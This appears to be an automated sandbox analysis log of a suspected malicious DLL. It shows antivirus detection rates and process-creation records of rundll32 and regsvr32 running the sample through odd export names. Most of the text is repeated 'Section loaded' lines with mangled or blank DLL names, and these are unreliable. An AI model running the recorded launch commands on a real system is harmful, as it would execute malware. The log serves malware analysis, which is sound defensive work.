Source: C:\Windows\System32\loaddll32.exe; Section loaded: & .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: % .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: $ .dll
Source: C:\Windows\System32\loaddll32.exe; Section loaded: # .dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ' .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ! .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ~ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: } .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: | .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: { .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: z .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: y .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: x .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: w .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: v .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: u .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: t .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: s .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: r .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: q .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: p .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: o .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: n .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: m .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: l .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: k .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: j .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: i .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: h .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: g .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: f .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: e .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: d .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: c .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: b .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: a .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ` .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: _ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ^ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ] .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: [ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: z .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: y .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: x .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: w .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: v .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: u .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: t .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: s .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: r .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: q .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: p .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: o .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: n .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: m .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: l .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: k .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: j .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: i .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: h .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: g .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: f .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: e .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: d .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: c .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: b .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: a .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: @ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ? .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: > .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: = .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: < .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ; .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: : .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 9 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 8 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 7 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 6 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 5 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 4 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 3 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 2 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 1 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 0 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: - .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: , .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: + .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: * .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ) .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ( .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ' .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: & .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: % .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: $ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: # .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ' .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ! .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
Source: C:\Windows\System32\loaddll32.exe | Section loaded: ~ .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: } .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: | .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: { .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: z .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: y .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: x .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: w .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: v .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: u .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: t .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: s .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: r .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: q .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: p .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: o .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: n .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: m .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: l .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: k .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: j .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: i .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: h .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: g .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: f .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: e .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: d .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: c .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: b .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: a .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: ` .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: _ .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: ^ .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: ] .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: [ .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: z .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: y .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: x .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: w .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: v .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: u .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: t .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: s .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: r .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: q .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: p .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: o .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: n .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: m .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: l .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: k .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: j .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: i .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: h .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: g .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: f .dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: e .dll
Source: qT9Qk5aKTk.dll | Static PE information: Number of sections : 12 > 10
Source: qT9Qk5aKTk.dll | Virustotal: Detection: 80%
Source: qT9Qk5aKTk.dll | Metadefender: Detection: 59%
Source: qT9Qk5aKTk.dll | ReversingLabs: Detection: 82%
Source: qT9Qk5aKTk.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll'
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\qT9Qk5aKTk.dll
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Aquatically
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Episodically
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Kakapo
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Overdistantness
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Pseudopodal
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Microphage
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Cytost
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17428 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Reattach
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Vigia
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Preallable
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Amphistomous
